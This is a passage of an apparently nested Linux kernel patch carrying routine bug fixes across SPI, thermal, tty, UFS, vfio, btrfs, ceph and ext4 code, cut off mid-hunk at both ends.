+@@ -454,6 +456,8 @@ static int stm32_spi_prepare_mbr(struct stm32_spi *spi, u32 speed_hz,
+ 
+ 	spi->cur_speed = spi->clk_rate / (1 << mbrdiv);
+ 
++	spi->cur_half_period = DIV_ROUND_CLOSEST(USEC_PER_SEC, 2 * spi->cur_speed);
++
+ 	return mbrdiv - 1;
+ }
+ 
+@@ -695,6 +699,10 @@ static void stm32h7_spi_disable(struct stm32_spi *spi)
+ 		return;
+ 	}
+ 
++	/* Add a delay to make sure that transmission is ended. */
++	if (spi->cur_half_period)
++		udelay(spi->cur_half_period);
++
+ 	if (spi->cur_usedma && spi->dma_tx)
+ 		dmaengine_terminate_all(spi->dma_tx);
+ 	if (spi->cur_usedma && spi->dma_rx)
+diff --git a/drivers/spi/spi-sun6i.c b/drivers/spi/spi-sun6i.c
+index 23ad052528dbe..d79853ba7792a 100644
+--- a/drivers/spi/spi-sun6i.c
++++ b/drivers/spi/spi-sun6i.c
+@@ -95,6 +95,7 @@ struct sun6i_spi {
+ 	struct reset_control	*rstc;
+ 
+ 	struct completion	done;
++	struct completion	dma_rx_done;
+ 
+ 	const u8		*tx_buf;
+ 	u8			*rx_buf;
+@@ -189,6 +190,13 @@ static size_t sun6i_spi_max_transfer_size(struct spi_device *spi)
+ 	return SUN6I_MAX_XFER_SIZE - 1;
+ }
+ 
++static void sun6i_spi_dma_rx_cb(void *param)
++{
++	struct sun6i_spi *sspi = param;
++
++	complete(&sspi->dma_rx_done);
++}
++
+ static int sun6i_spi_prepare_dma(struct sun6i_spi *sspi,
+ 				 struct spi_transfer *tfr)
+ {
+@@ -200,7 +208,7 @@ static int sun6i_spi_prepare_dma(struct sun6i_spi *sspi,
+ 		struct dma_slave_config rxconf = {
+ 			.direction = DMA_DEV_TO_MEM,
+ 			.src_addr = sspi->dma_addr_rx,
+-			.src_addr_width = DMA_SLAVE_BUSWIDTH_4_BYTES,
++			.src_addr_width = DMA_SLAVE_BUSWIDTH_1_BYTE,
+ 			.src_maxburst = 8,
+ 		};
+ 
+@@ -213,6 +221,8 @@ static int sun6i_spi_prepare_dma(struct sun6i_spi *sspi,
+ 						 DMA_PREP_INTERRUPT);
+ 		if (!rxdesc)
+ 			return -EINVAL;
++		rxdesc->callback_param = sspi;
++		rxdesc->callback = sun6i_spi_dma_rx_cb;
+ 	}
+ 
+ 	txdesc = NULL;
+@@ -268,6 +278,7 @@ static int sun6i_spi_transfer_one(struct spi_master *master,
+ 		return -EINVAL;
+ 
+ 	reinit_completion(&sspi->done);
++	reinit_completion(&sspi->dma_rx_done);
+ 	sspi->tx_buf = tfr->tx_buf;
+ 	sspi->rx_buf = tfr->rx_buf;
+ 	sspi->len = tfr->len;
+@@ -426,6 +437,22 @@ static int sun6i_spi_transfer_one(struct spi_master *master,
+ 	start = jiffies;
+ 	timeout = wait_for_completion_timeout(&sspi->done,
+ 					      msecs_to_jiffies(tx_time));
++
++	if (!use_dma) {
++		sun6i_spi_drain_fifo(sspi);
++	} else {
++		if (timeout && rx_len) {
++			/*
++			 * Even though RX on the peripheral side has finished
++			 * RX DMA might still be in flight
++			 */
++			timeout = wait_for_completion_timeout(&sspi->dma_rx_done,
++							      timeout);
++			if (!timeout)
++				dev_warn(&master->dev, "RX DMA timeout\n");
++		}
++	}
++
+ 	end = jiffies;
+ 	if (!timeout) {
+ 		dev_warn(&master->dev,
+@@ -453,7 +480,6 @@ static irqreturn_t sun6i_spi_handler(int irq, void *dev_id)
+ 	/* Transfer complete */
+ 	if (status & SUN6I_INT_CTL_TC) {
+ 		sun6i_spi_write(sspi, SUN6I_INT_STA_REG, SUN6I_INT_CTL_TC);
+-		sun6i_spi_drain_fifo(sspi);
+ 		complete(&sspi->done);
+ 		return IRQ_HANDLED;
+ 	}
+@@ -611,6 +637,7 @@ static int sun6i_spi_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	init_completion(&sspi->done);
++	init_completion(&sspi->dma_rx_done);
+ 
+ 	sspi->rstc = devm_reset_control_get_exclusive(&pdev->dev, NULL);
+ 	if (IS_ERR(sspi->rstc)) {
+diff --git a/drivers/thermal/thermal_of.c b/drivers/thermal/thermal_of.c
+index 762d1990180bf..4104743dbc17e 100644
+--- a/drivers/thermal/thermal_of.c
++++ b/drivers/thermal/thermal_of.c
+@@ -149,8 +149,10 @@ static int of_find_trip_id(struct device_node *np, struct device_node *trip)
+ 	 */
+ 	for_each_child_of_node(trips, t) {
+ 
+-		if (t == trip)
++		if (t == trip) {
++			of_node_put(t);
+ 			goto out;
++		}
+ 		i++;
+ 	}
+ 
+@@ -519,8 +521,10 @@ static int thermal_of_for_each_cooling_maps(struct thermal_zone_device *tz,
+ 
+ 	for_each_child_of_node(cm_np, child) {
+ 		ret = thermal_of_for_each_cooling_device(tz_np, child, tz, cdev, action);
+-		if (ret)
++		if (ret) {
++			of_node_put(child);
+ 			break;
++		}
+ 	}
+ 
+ 	of_node_put(cm_np);
+diff --git a/drivers/tty/n_gsm.c b/drivers/tty/n_gsm.c
+index c1fa20a4e3420..4b43589304704 100644
+--- a/drivers/tty/n_gsm.c
++++ b/drivers/tty/n_gsm.c
+@@ -2509,10 +2509,8 @@ static void gsm_cleanup_mux(struct gsm_mux *gsm, bool disc)
+ 		gsm->has_devices = false;
+ 	}
+ 	for (i = NUM_DLCI - 1; i >= 0; i--)
+-		if (gsm->dlci[i]) {
++		if (gsm->dlci[i])
+ 			gsm_dlci_release(gsm->dlci[i]);
+-			gsm->dlci[i] = NULL;
+-		}
+ 	mutex_unlock(&gsm->mutex);
+ 	/* Now wipe the queues */
+ 	tty_ldisc_flush(gsm->tty);
+diff --git a/drivers/tty/serial/8250/8250_port.c b/drivers/tty/serial/8250/8250_port.c
+index 38760bd6e0c29..8efe31448df3c 100644
+--- a/drivers/tty/serial/8250/8250_port.c
++++ b/drivers/tty/serial/8250/8250_port.c
+@@ -1953,7 +1953,10 @@ int serial8250_handle_irq(struct uart_port *port, unsigned int iir)
+ 		skip_rx = true;
+ 
+ 	if (status & (UART_LSR_DR | UART_LSR_BI) && !skip_rx) {
+-		if (irqd_is_wakeup_set(irq_get_irq_data(port->irq)))
++		struct irq_data *d;
++
++		d = irq_get_irq_data(port->irq);
++		if (d && irqd_is_wakeup_set(d))
+ 			pm_wakeup_event(tport->tty->dev, 0);
+ 		if (!up->dma || handle_rx_dma(up, iir))
+ 			status = serial8250_rx_chars(up, status);
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index 36437d39b93c8..b4e3f14b9a3d7 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -22,6 +22,7 @@
+ #include <linux/module.h>
+ #include <linux/regulator/consumer.h>
+ #include <linux/sched/clock.h>
++#include <linux/iopoll.h>
+ #include <scsi/scsi_cmnd.h>
+ #include <scsi/scsi_dbg.h>
+ #include <scsi/scsi_driver.h>
+@@ -2254,7 +2255,11 @@ static inline int ufshcd_hba_capabilities(struct ufs_hba *hba)
+  */
+ static inline bool ufshcd_ready_for_uic_cmd(struct ufs_hba *hba)
+ {
+-	return ufshcd_readl(hba, REG_CONTROLLER_STATUS) & UIC_COMMAND_READY;
++	u32 val;
++	int ret = read_poll_timeout(ufshcd_readl, val, val & UIC_COMMAND_READY,
++				    500, UIC_CMD_TIMEOUT * 1000, false, hba,
++				    REG_CONTROLLER_STATUS);
++	return ret == 0 ? true : false;
+ }
+ 
+ /**
+@@ -2346,7 +2351,6 @@ __ufshcd_send_uic_cmd(struct ufs_hba *hba, struct uic_command *uic_cmd,
+ 		      bool completion)
+ {
+ 	lockdep_assert_held(&hba->uic_cmd_mutex);
+-	lockdep_assert_held(hba->host->host_lock);
+ 
+ 	if (!ufshcd_ready_for_uic_cmd(hba)) {
+ 		dev_err(hba->dev,
+@@ -2373,7 +2377,6 @@ __ufshcd_send_uic_cmd(struct ufs_hba *hba, struct uic_command *uic_cmd,
+ int ufshcd_send_uic_cmd(struct ufs_hba *hba, struct uic_command *uic_cmd)
+ {
+ 	int ret;
+-	unsigned long flags;
+ 
+ 	if (hba->quirks & UFSHCD_QUIRK_BROKEN_UIC_CMD)
+ 		return 0;
+@@ -2382,9 +2385,7 @@ int ufshcd_send_uic_cmd(struct ufs_hba *hba, struct uic_command *uic_cmd)
+ 	mutex_lock(&hba->uic_cmd_mutex);
+ 	ufshcd_add_delay_before_dme_cmd(hba);
+ 
+-	spin_lock_irqsave(hba->host->host_lock, flags);
+ 	ret = __ufshcd_send_uic_cmd(hba, uic_cmd, true);
+-	spin_unlock_irqrestore(hba->host->host_lock, flags);
+ 	if (!ret)
+ 		ret = ufshcd_wait_for_uic_cmd(hba, uic_cmd);
+ 
+@@ -4076,8 +4077,8 @@ static int ufshcd_uic_pwr_ctrl(struct ufs_hba *hba, struct uic_command *cmd)
+ 		wmb();
+ 		reenable_intr = true;
+ 	}
+-	ret = __ufshcd_send_uic_cmd(hba, cmd, false);
+ 	spin_unlock_irqrestore(hba->host->host_lock, flags);
++	ret = __ufshcd_send_uic_cmd(hba, cmd, false);
+ 	if (ret) {
+ 		dev_err(hba->dev,
+ 			"pwr ctrl cmd 0x%x with mode 0x%x uic error %d\n",
+diff --git a/drivers/vfio/mdev/mdev_sysfs.c b/drivers/vfio/mdev/mdev_sysfs.c
+index abe3359dd477f..16b007c6bbb56 100644
+--- a/drivers/vfio/mdev/mdev_sysfs.c
++++ b/drivers/vfio/mdev/mdev_sysfs.c
+@@ -233,7 +233,8 @@ int parent_create_sysfs_files(struct mdev_parent *parent)
+ out_err:
+ 	while (--i >= 0)
+ 		mdev_type_remove(parent->types[i]);
+-	return 0;
++	kset_unregister(parent->mdev_types_kset);
++	return ret;
+ }
+ 
+ static ssize_t remove_store(struct device *dev, struct device_attribute *attr,
+diff --git a/drivers/video/fbdev/Kconfig b/drivers/video/fbdev/Kconfig
+index 974e862cd20d6..ff95f19224901 100644
+--- a/drivers/video/fbdev/Kconfig
++++ b/drivers/video/fbdev/Kconfig
+@@ -2015,7 +2015,7 @@ config FB_COBALT
+ 
+ config FB_SH7760
+ 	bool "SH7760/SH7763/SH7720/SH7721 LCDC support"
+-	depends on FB && (CPU_SUBTYPE_SH7760 || CPU_SUBTYPE_SH7763 \
++	depends on FB=y && (CPU_SUBTYPE_SH7760 || CPU_SUBTYPE_SH7763 \
+ 		|| CPU_SUBTYPE_SH7720 || CPU_SUBTYPE_SH7721)
+ 	select FB_CFB_FILLRECT
+ 	select FB_CFB_COPYAREA
+diff --git a/fs/binfmt_elf_fdpic.c b/fs/binfmt_elf_fdpic.c
+index 069f12cc7634c..2aecd4ffb13b3 100644
+--- a/fs/binfmt_elf_fdpic.c
++++ b/fs/binfmt_elf_fdpic.c
+@@ -345,10 +345,9 @@ static int load_elf_fdpic_binary(struct linux_binprm *bprm)
+ 	/* there's now no turning back... the old userspace image is dead,
+ 	 * defunct, deceased, etc.
+ 	 */
++	SET_PERSONALITY(exec_params.hdr);
+ 	if (elf_check_fdpic(&exec_params.hdr))
+-		set_personality(PER_LINUX_FDPIC);
+-	else
+-		set_personality(PER_LINUX);
++		current->personality |= PER_LINUX_FDPIC;
+ 	if (elf_read_implies_exec(&exec_params.hdr, executable_stack))
+ 		current->personality |= READ_IMPLIES_EXEC;
+ 
+diff --git a/fs/btrfs/delayed-inode.c b/fs/btrfs/delayed-inode.c
+index d2cbb7733c7d6..1331e56e8e84f 100644
+--- a/fs/btrfs/delayed-inode.c
++++ b/fs/btrfs/delayed-inode.c
+@@ -407,6 +407,7 @@ static void finish_one_item(struct btrfs_delayed_root *delayed_root)
+ 
+ static void __btrfs_remove_delayed_item(struct btrfs_delayed_item *delayed_item)
+ {
++	struct btrfs_delayed_node *delayed_node = delayed_item->delayed_node;
+ 	struct rb_root_cached *root;
+ 	struct btrfs_delayed_root *delayed_root;
+ 
+@@ -414,18 +415,21 @@ static void __btrfs_remove_delayed_item(struct btrfs_delayed_item *delayed_item)
+ 	if (RB_EMPTY_NODE(&delayed_item->rb_node))
+ 		return;
+ 
+-	delayed_root = delayed_item->delayed_node->root->fs_info->delayed_root;
++	/* If it's in a rbtree, then we need to have delayed node locked. */
++	lockdep_assert_held(&delayed_node->mutex);
++
++	delayed_root = delayed_node->root->fs_info->delayed_root;
+ 
+ 	BUG_ON(!delayed_root);
+ 
+ 	if (delayed_item->type == BTRFS_DELAYED_INSERTION_ITEM)
+-		root = &delayed_item->delayed_node->ins_root;
++		root = &delayed_node->ins_root;
+ 	else
+-		root = &delayed_item->delayed_node->del_root;
++		root = &delayed_node->del_root;
+ 
+ 	rb_erase_cached(&delayed_item->rb_node, root);
+ 	RB_CLEAR_NODE(&delayed_item->rb_node);
+-	delayed_item->delayed_node->count--;
++	delayed_node->count--;
+ 
+ 	finish_one_item(delayed_root);
+ }
+@@ -1421,7 +1425,29 @@ void btrfs_balance_delayed_items(struct btrfs_fs_info *fs_info)
+ 	btrfs_wq_run_delayed_node(delayed_root, fs_info, BTRFS_DELAYED_BATCH);
+ }
+ 
+-/* Will return 0 or -ENOMEM */
++static void btrfs_release_dir_index_item_space(struct btrfs_trans_handle *trans)
++{
++	struct btrfs_fs_info *fs_info = trans->fs_info;
++	const u64 bytes = btrfs_calc_insert_metadata_size(fs_info, 1);
++
++	if (test_bit(BTRFS_FS_LOG_RECOVERING, &fs_info->flags))
++		return;
++
++	/*
++	 * Adding the new dir index item does not require touching another
++	 * leaf, so we can release 1 unit of metadata that was previously
++	 * reserved when starting the transaction. This applies only to
++	 * the case where we had a transaction start and excludes the
++	 * transaction join case (when replaying log trees).
++	 */
++	trace_btrfs_space_reservation(fs_info, "transaction",
++				      trans->transid, bytes, 0);
++	btrfs_block_rsv_release(fs_info, trans->block_rsv, bytes, NULL);
++	ASSERT(trans->bytes_reserved >= bytes);
++	trans->bytes_reserved -= bytes;
++}
++
++/* Will return 0, -ENOMEM or -EEXIST (index number collision, unexpected). */
+ int btrfs_insert_delayed_dir_index(struct btrfs_trans_handle *trans,
+ 				   const char *name, int name_len,
+ 				   struct btrfs_inode *dir,
+@@ -1463,6 +1489,27 @@ int btrfs_insert_delayed_dir_index(struct btrfs_trans_handle *trans,
+ 
+ 	mutex_lock(&delayed_node->mutex);
+ 
++	/*
++	 * First attempt to insert the delayed item. This is to make the error
++	 * handling path simpler in case we fail (-EEXIST). There's no risk of
++	 * any other task coming in and running the delayed item before we do
++	 * the metadata space reservation below, because we are holding the
++	 * delayed node's mutex and that mutex must also be locked before the
++	 * node's delayed items can be run.
++	 */
++	ret = __btrfs_add_delayed_item(delayed_node, delayed_item);
++	if (unlikely(ret)) {
++		btrfs_err(trans->fs_info,
++"error adding delayed dir index item, name: %.*s, index: %llu, root: %llu, dir: %llu, dir->index_cnt: %llu, delayed_node->index_cnt: %llu, error: %d",
++			  name_len, name, index, btrfs_root_id(delayed_node->root),
++			  delayed_node->inode_id, dir->index_cnt,
++			  delayed_node->index_cnt, ret);
++		btrfs_release_delayed_item(delayed_item);
++		btrfs_release_dir_index_item_space(trans);
++		mutex_unlock(&delayed_node->mutex);
++		goto release_node;
++	}
++
+ 	if (delayed_node->index_item_leaves == 0 ||
+ 	    delayed_node->curr_index_batch_size + data_len > leaf_data_size) {
+ 		delayed_node->curr_index_batch_size = data_len;
+@@ -1480,36 +1527,14 @@ int btrfs_insert_delayed_dir_index(struct btrfs_trans_handle *trans,
+ 		 * impossible.
+ 		 */
+ 		if (WARN_ON(ret)) {
+-			mutex_unlock(&delayed_node->mutex);
+ 			btrfs_release_delayed_item(delayed_item);
++			mutex_unlock(&delayed_node->mutex);
+ 			goto release_node;
+ 		}
+ 
+ 		delayed_node->index_item_leaves++;
+-	} else if (!test_bit(BTRFS_FS_LOG_RECOVERING, &fs_info->flags)) {
+-		const u64 bytes = btrfs_calc_insert_metadata_size(fs_info, 1);
+-
+-		/*
+-		 * Adding the new dir index item does not require touching another
+-		 * leaf, so we can release 1 unit of metadata that was previously
+-		 * reserved when starting the transaction. This applies only to
+-		 * the case where we had a transaction start and excludes the
+-		 * transaction join case (when replaying log trees).
+-		 */
+-		trace_btrfs_space_reservation(fs_info, "transaction",
+-					      trans->transid, bytes, 0);
+-		btrfs_block_rsv_release(fs_info, trans->block_rsv, bytes, NULL);
+-		ASSERT(trans->bytes_reserved >= bytes);
+-		trans->bytes_reserved -= bytes;
+-	}
+-
+-	ret = __btrfs_add_delayed_item(delayed_node, delayed_item);
+-	if (unlikely(ret)) {
+-		btrfs_err(trans->fs_info,
+-			  "err add delayed dir index item(name: %.*s) into the insertion tree of the delayed node(root id: %llu, inode id: %llu, errno: %d)",
+-			  name_len, name, delayed_node->root->root_key.objectid,
+-			  delayed_node->inode_id, ret);
+-		BUG();
++	} else {
++		btrfs_release_dir_index_item_space(trans);
+ 	}
+ 	mutex_unlock(&delayed_node->mutex);
+ 
+diff --git a/fs/btrfs/extent_io.c b/fs/btrfs/extent_io.c
+index 0ad69041954ff..afcc96a1f4276 100644
+--- a/fs/btrfs/extent_io.c
++++ b/fs/btrfs/extent_io.c
+@@ -5184,8 +5184,14 @@ void read_extent_buffer(const struct extent_buffer *eb, void *dstv,
+ 	char *dst = (char *)dstv;
+ 	unsigned long i = get_eb_page_index(start);
+ 
+-	if (check_eb_range(eb, start, len))
++	if (check_eb_range(eb, start, len)) {
++		/*
++		 * Invalid range hit, reset the memory, so callers won't get
++		 * some random garbage for their uninitialzed memory.
++		 */
++		memset(dstv, 0, len);
+ 		return;
++	}
+ 
+ 	offset = get_eb_offset_in_page(eb, start);
+ 
+diff --git a/fs/btrfs/super.c b/fs/btrfs/super.c
+index 6438300fa2461..582b71b7fa779 100644
+--- a/fs/btrfs/super.c
++++ b/fs/btrfs/super.c
+@@ -2418,7 +2418,7 @@ static int btrfs_statfs(struct dentry *dentry, struct kstatfs *buf)
+ 	 * calculated f_bavail.
+ 	 */
+ 	if (!mixed && block_rsv->space_info->full &&
+-	    total_free_meta - thresh < block_rsv->size)
++	    (total_free_meta < thresh || total_free_meta - thresh < block_rsv->size))
+ 		buf->f_bavail = 0;
+ 
+ 	buf->f_type = BTRFS_SUPER_MAGIC;
+diff --git a/fs/ceph/caps.c b/fs/ceph/caps.c
+index 4a9ad5ff726d4..36052a3626830 100644
+--- a/fs/ceph/caps.c
++++ b/fs/ceph/caps.c
+@@ -4100,6 +4100,9 @@ void ceph_handle_caps(struct ceph_mds_session *session,
+ 
+ 	dout("handle_caps from mds%d\n", session->s_mds);
+ 
++	if (!ceph_inc_mds_stopping_blocker(mdsc, session))
++		return;
++
+ 	/* decode */
+ 	end = msg->front.iov_base + msg->front.iov_len;
+ 	if (msg->front.iov_len < sizeof(*h))
+@@ -4196,7 +4199,6 @@ void ceph_handle_caps(struct ceph_mds_session *session,
+ 	     vino.snap, inode);
+ 
+ 	mutex_lock(&session->s_mutex);
+-	inc_session_sequence(session);
+ 	dout(" mds%d seq %lld cap seq %u\n", session->s_mds, session->s_seq,
+ 	     (unsigned)seq);
+ 
+@@ -4299,6 +4301,8 @@ done:
+ done_unlocked:
+ 	iput(inode);
+ out:
++	ceph_dec_mds_stopping_blocker(mdsc);
++
+ 	ceph_put_string(extra_info.pool_ns);
+ 
+ 	/* Defer closing the sessions after s_mutex lock being released */
+diff --git a/fs/ceph/mds_client.c b/fs/ceph/mds_client.c
+index 5399a9ea5b4f1..f6a7fd47efd7a 100644
+--- a/fs/ceph/mds_client.c
++++ b/fs/ceph/mds_client.c
+@@ -4546,6 +4546,9 @@ static void handle_lease(struct ceph_mds_client *mdsc,
+ 
+ 	dout("handle_lease from mds%d\n", mds);
+ 
++	if (!ceph_inc_mds_stopping_blocker(mdsc, session))
++		return;
++
+ 	/* decode */
+ 	if (msg->front.iov_len < sizeof(*h) + sizeof(u32))
+ 		goto bad;
+@@ -4564,8 +4567,6 @@ static void handle_lease(struct ceph_mds_client *mdsc,
+ 	     dname.len, dname.name);
+ 
+ 	mutex_lock(&session->s_mutex);
+-	inc_session_sequence(session);
+-
+ 	if (!inode) {
+ 		dout("handle_lease no inode %llx\n", vino.ino);
+ 		goto release;
+@@ -4627,9 +4628,13 @@ release:
+ out:
+ 	mutex_unlock(&session->s_mutex);
+ 	iput(inode);
++
++	ceph_dec_mds_stopping_blocker(mdsc);
+ 	return;
+ 
+ bad:
++	ceph_dec_mds_stopping_blocker(mdsc);
++
+ 	pr_err("corrupt lease message\n");
+ 	ceph_msg_dump(msg);
+ }
+@@ -4825,6 +4830,9 @@ int ceph_mdsc_init(struct ceph_fs_client *fsc)
+ 	}
+ 
+ 	init_completion(&mdsc->safe_umount_waiters);
++	spin_lock_init(&mdsc->stopping_lock);
++	atomic_set(&mdsc->stopping_blockers, 0);
++	init_completion(&mdsc->stopping_waiter);
+ 	init_waitqueue_head(&mdsc->session_close_wq);
+ 	INIT_LIST_HEAD(&mdsc->waiting_for_map);
+ 	mdsc->quotarealms_inodes = RB_ROOT;
+diff --git a/fs/ceph/mds_client.h b/fs/ceph/mds_client.h
+index 9a80658f41679..0913959ccfa64 100644
+--- a/fs/ceph/mds_client.h
++++ b/fs/ceph/mds_client.h
+@@ -381,8 +381,9 @@ struct cap_wait {
+ };
+ 
+ enum {
+-       CEPH_MDSC_STOPPING_BEGIN = 1,
+-       CEPH_MDSC_STOPPING_FLUSHED = 2,
++	CEPH_MDSC_STOPPING_BEGIN = 1,
++	CEPH_MDSC_STOPPING_FLUSHING = 2,
++	CEPH_MDSC_STOPPING_FLUSHED = 3,
+ };
+ 
+ /*
+@@ -401,7 +402,11 @@ struct ceph_mds_client {
+ 	struct ceph_mds_session **sessions;    /* NULL for mds if no session */
+ 	atomic_t		num_sessions;
+ 	int                     max_sessions;  /* len of sessions array */
+-	int                     stopping;      /* true if shutting down */
++
++	spinlock_t              stopping_lock;  /* protect snap_empty */
++	int                     stopping;      /* the stage of shutting down */
++	atomic_t                stopping_blockers;
++	struct completion	stopping_waiter;
+ 
+ 	atomic64_t		quotarealms_count; /* # realms with quota */
+ 	/*
+diff --git a/fs/ceph/quota.c b/fs/ceph/quota.c
+index 64592adfe48fb..f7fcf7f08ec64 100644
+--- a/fs/ceph/quota.c
++++ b/fs/ceph/quota.c
+@@ -47,25 +47,23 @@ void ceph_handle_quota(struct ceph_mds_client *mdsc,
+ 	struct inode *inode;
+ 	struct ceph_inode_info *ci;
+ 
++	if (!ceph_inc_mds_stopping_blocker(mdsc, session))
++		return;
++
+ 	if (msg->front.iov_len < sizeof(*h)) {
+ 		pr_err("%s corrupt message mds%d len %d\n", __func__,
+ 		       session->s_mds, (int)msg->front.iov_len);
+ 		ceph_msg_dump(msg);
+-		return;
++		goto out;
+ 	}
+ 
+-	/* increment msg sequence number */
+-	mutex_lock(&session->s_mutex);
+-	inc_session_sequence(session);
+-	mutex_unlock(&session->s_mutex);
+-
+ 	/* lookup inode */
+ 	vino.ino = le64_to_cpu(h->ino);
+ 	vino.snap = CEPH_NOSNAP;
+ 	inode = ceph_find_inode(sb, vino);
+ 	if (!inode) {
+ 		pr_warn("Failed to find inode %llu\n", vino.ino);
+-		return;
++		goto out;
+ 	}
+ 	ci = ceph_inode(inode);
+ 
+@@ -78,6 +76,8 @@ void ceph_handle_quota(struct ceph_mds_client *mdsc,
+ 	spin_unlock(&ci->i_ceph_lock);
+ 
+ 	iput(inode);
++out:
++	ceph_dec_mds_stopping_blocker(mdsc);
+ }
+ 
+ static struct ceph_quotarealm_inode *
+diff --git a/fs/ceph/snap.c b/fs/ceph/snap.c
+index 2e73ba62bd7aa..82f7592e1747b 100644
+--- a/fs/ceph/snap.c
++++ b/fs/ceph/snap.c
+@@ -1012,6 +1012,9 @@ void ceph_handle_snap(struct ceph_mds_client *mdsc,
+ 	int locked_rwsem = 0;
+ 	bool close_sessions = false;
+ 
++	if (!ceph_inc_mds_stopping_blocker(mdsc, session))
++		return;
++
+ 	/* decode */
+ 	if (msg->front.iov_len < sizeof(*h))
+ 		goto bad;
+@@ -1027,10 +1030,6 @@ void ceph_handle_snap(struct ceph_mds_client *mdsc,
+ 	dout("%s from mds%d op %s split %llx tracelen %d\n", __func__,
+ 	     mds, ceph_snap_op_name(op), split, trace_len);
+ 
+-	mutex_lock(&session->s_mutex);
+-	inc_session_sequence(session);
+-	mutex_unlock(&session->s_mutex);
+-
+ 	down_write(&mdsc->snap_rwsem);
+ 	locked_rwsem = 1;
+ 
+@@ -1148,6 +1147,7 @@ skip_inode:
+ 	up_write(&mdsc->snap_rwsem);
+ 
+ 	flush_snaps(mdsc);
++	ceph_dec_mds_stopping_blocker(mdsc);
+ 	return;
+ 
+ bad:
+@@ -1157,6 +1157,8 @@ out:
+ 	if (locked_rwsem)
+ 		up_write(&mdsc->snap_rwsem);
+ 
++	ceph_dec_mds_stopping_blocker(mdsc);
++
+ 	if (close_sessions)
+ 		ceph_mdsc_close_sessions(mdsc);
+ 	return;
+diff --git a/fs/ceph/super.c b/fs/ceph/super.c
+index a5f52013314d6..281b493fdac8e 100644
+--- a/fs/ceph/super.c
++++ b/fs/ceph/super.c
+@@ -1365,25 +1365,90 @@ nomem:
+ 	return -ENOMEM;
+ }
+ 
++/*
++ * Return true if it successfully increases the blocker counter,
++ * or false if the mdsc is in stopping and flushed state.
++ */
++static bool __inc_stopping_blocker(struct ceph_mds_client *mdsc)
++{
++	spin_lock(&mdsc->stopping_lock);
++	if (mdsc->stopping >= CEPH_MDSC_STOPPING_FLUSHING) {
++		spin_unlock(&mdsc->stopping_lock);
++		return false;
++	}
++	atomic_inc(&mdsc->stopping_blockers);
++	spin_unlock(&mdsc->stopping_lock);
++	return true;
++}
++
++static void __dec_stopping_blocker(struct ceph_mds_client *mdsc)
++{
++	spin_lock(&mdsc->stopping_lock);
++	if (!atomic_dec_return(&mdsc->stopping_blockers) &&
++	    mdsc->stopping >= CEPH_MDSC_STOPPING_FLUSHING)
++		complete_all(&mdsc->stopping_waiter);
++	spin_unlock(&mdsc->stopping_lock);
++}
++
++/* For metadata IO requests */
++bool ceph_inc_mds_stopping_blocker(struct ceph_mds_client *mdsc,
++				   struct ceph_mds_session *session)
++{
++	mutex_lock(&session->s_mutex);
++	inc_session_sequence(session);
++	mutex_unlock(&session->s_mutex);
++
++	return __inc_stopping_blocker(mdsc);
++}
++
++void ceph_dec_mds_stopping_blocker(struct ceph_mds_client *mdsc)
++{
++	__dec_stopping_blocker(mdsc);
++}
++
+ static void ceph_kill_sb(struct super_block *s)
+ {
+ 	struct ceph_fs_client *fsc = ceph_sb_to_client(s);
++	struct ceph_mds_client *mdsc = fsc->mdsc;
++	bool wait;
+ 
+ 	dout("kill_sb %p\n", s);
+ 
+-	ceph_mdsc_pre_umount(fsc->mdsc);
++	ceph_mdsc_pre_umount(mdsc);
+ 	flush_fs_workqueues(fsc);
+ 
+ 	/*
+ 	 * Though the kill_anon_super() will finally trigger the
+-	 * sync_filesystem() anyway, we still need to do it here
+-	 * and then bump the stage of shutdown to stop the work
+-	 * queue as earlier as possible.
++	 * sync_filesystem() anyway, we still need to do it here and
++	 * then bump the stage of shutdown. This will allow us to
++	 * drop any further message, which will increase the inodes'
++	 * i_count reference counters but makes no sense any more,
++	 * from MDSs.
++	 *
++	 * Without this when evicting the inodes it may fail in the
++	 * kill_anon_super(), which will trigger a warning when
++	 * destroying the fscrypt keyring and then possibly trigger
++	 * a further crash in ceph module when the iput() tries to
++	 * evict the inodes later.
+ 	 */
+ 	sync_filesystem(s);
+ 
+-	fsc->mdsc->stopping = CEPH_MDSC_STOPPING_FLUSHED;
++	spin_lock(&mdsc->stopping_lock);
++	mdsc->stopping = CEPH_MDSC_STOPPING_FLUSHING;
++	wait = !!atomic_read(&mdsc->stopping_blockers);
++	spin_unlock(&mdsc->stopping_lock);
++
++	if (wait && atomic_read(&mdsc->stopping_blockers)) {
++		long timeleft = wait_for_completion_killable_timeout(
++					&mdsc->stopping_waiter,
++					fsc->client->options->mount_timeout);
++		if (!timeleft) /* timed out */
++			pr_warn("umount timed out, %ld\n", timeleft);
++		else if (timeleft < 0) /* killed */
++			pr_warn("umount was killed, %ld\n", timeleft);
++	}
+ 
++	mdsc->stopping = CEPH_MDSC_STOPPING_FLUSHED;
+ 	kill_anon_super(s);
+ 
+ 	fsc->client->extra_mon_dispatch = NULL;
+diff --git a/fs/ceph/super.h b/fs/ceph/super.h
+index 562f42f4a77d7..7ca74f5f70be5 100644
+--- a/fs/ceph/super.h
++++ b/fs/ceph/super.h
+@@ -1374,4 +1374,7 @@ extern bool ceph_quota_update_statfs(struct ceph_fs_client *fsc,
+ 				     struct kstatfs *buf);
+ extern void ceph_cleanup_quotarealms_inodes(struct ceph_mds_client *mdsc);
+ 
++bool ceph_inc_mds_stopping_blocker(struct ceph_mds_client *mdsc,
++			       struct ceph_mds_session *session);
++void ceph_dec_mds_stopping_blocker(struct ceph_mds_client *mdsc);
+ #endif /* _FS_CEPH_SUPER_H */
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 016925b1a0908..3c8300e08f412 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -16,6 +16,7 @@
+ #include <linux/slab.h>
+ #include <linux/nospec.h>
+ #include <linux/backing-dev.h>
++#include <linux/freezer.h>
+ #include <trace/events/ext4.h>
+ 
+ /*
+@@ -6420,6 +6421,21 @@ __acquires(bitlock)
+ 	return ret;
+ }
+ 
++static ext4_grpblk_t ext4_last_grp_cluster(struct super_block *sb,
++					   ext4_group_t grp)
++{
++	if (grp < ext4_get_groups_count(sb))
++		return EXT4_CLUSTERS_PER_GROUP(sb) - 1;
++	return (ext4_blocks_count(EXT4_SB(sb)->s_es) -
++		ext4_group_first_block_no(sb, grp) - 1) >>
